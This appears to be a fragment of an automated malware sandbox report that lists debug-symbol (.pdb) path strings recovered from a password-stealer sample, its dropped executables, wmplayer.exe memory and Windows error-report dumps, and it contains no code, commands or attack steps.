                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.Services.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.pdbMZ source: WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Messaging.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: sysglobl.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Core.Presentation.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdbSystem.Runtime.ni.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.Web.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: sysglobl.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Deployment.pdbMZ source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Presentation.pdb_C source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Services.Client.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: mscorlib.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Diagnostics.Tracing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.RegularExpressions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdbMZ@ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Entity.pdbp source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.Formatters.Soap.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.WasHosting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Channels.pdbh$ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: aspnet_wp.pdb source: Microsoft.exe, 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmp, Microsoft.exe, 00000010.00000000.1785763182.00007FF7FE547000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.exed source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Windows.ApplicationServer.Applications.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xaml.ni.pdbRSDSDg{V source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Framework.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Routing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdb! source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Transactions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \Registry\Machine\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbSystem.Web.RegularExpressions.dllSystem.Web.RegularExpressions.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.RegularExpressions.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.SqlXml.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.RegularExpressions.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.ni.pdb( source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbSystem.Xml.XmlSerializer.dllH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Entity.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Mobile.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Linq.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdbPj source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: SMDiagnostics.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xml.Linq.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbzS source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Dynamic.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wmplayer.pdbGCTL source: wmplayer.exe, 00000029.00000003.2458942503.000001DDEEFF0000.00000004.00000001.00020000.00000000.sdmp, pkiwizgebqxq.exe.41.dr
                  Source: Binary string: NGenTaskLauncher.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdbMZ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Services.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: BindoC:\Windows\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.DurableInstancing.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.DirectoryServices.Protocols.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Serialization.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Activities.Core.Presentation.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Engine.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: pC:\Users\user\AppData\Local\Temp\spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdbSystem.Reflection.Emit.Lightweight.dllH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Drawing.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb:\W/M source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.Build.Tasks.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.Protocols.pdb:\W source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: wmplayer.pdb source: wmplayer.exe, 00000029.00000003.2458942503.000001DDEEFF0000.00000004.00000001.00020000.00000000.sdmp, pkiwizgebqxq.exe.41.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDBJ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E991D5000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualC.pdbSystem.Xml.XPath.XDocument.dllSystem.Xml.XPath.XDocument.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Device.pdbSystem.Threading.Tasks.Parallel.dllPP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Workflow.Activities.pdb &8 source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Messaging.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Management.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\HFayo.pdbdb@ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.Core.Presentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.AddIn.Contract.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Management.Instrumentation.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Core.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.Extensions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceProcess.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\HFayo.pdbBS source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Net.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XamlBuildTask.pdbP4 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Deployment.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Security.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceModel.Activation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdbP< source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Build.Framework.pdb0; source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb} source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.Protocols.pdbSystem.Windows.Forms.DataVisualization.Design.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.pdbMicrosoft.VisualC.dllMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.ni.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.AddIn.Contract.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Activities.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Transactions.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, ohvrxt.exe.3.dr
                  Source: Binary string: System.Transactions.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.Data.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceModel.Activities.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.Install.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.Dtc.pdb.CRT$XIZ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.Web.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.pdb0<c source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.Channels.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Design.pdbSystem.AddIn.dllSystem.Dynamic.dllSystem.AddIn.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.Remoting.pdbp^a source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Internals.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Dynamic.pdbH source: WER696F.tmp.dmp.30.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.DurableInstancing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: ISymWrapper.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb\?\p source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdbSystem.Runtime.Handles.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: CustomMarshalers.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdbpFM source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Net.Http.pdbSystem.Linq.Queryable.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.Routing.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Extensions.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Client.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdb` source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Workflow.Runtime.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XamlBuildTask.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.pdbSystem.Resources.ResourceManager.dllSystem.ComponentModel.Annotations.dllSystem.Resources.ResourceManager.dllL source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
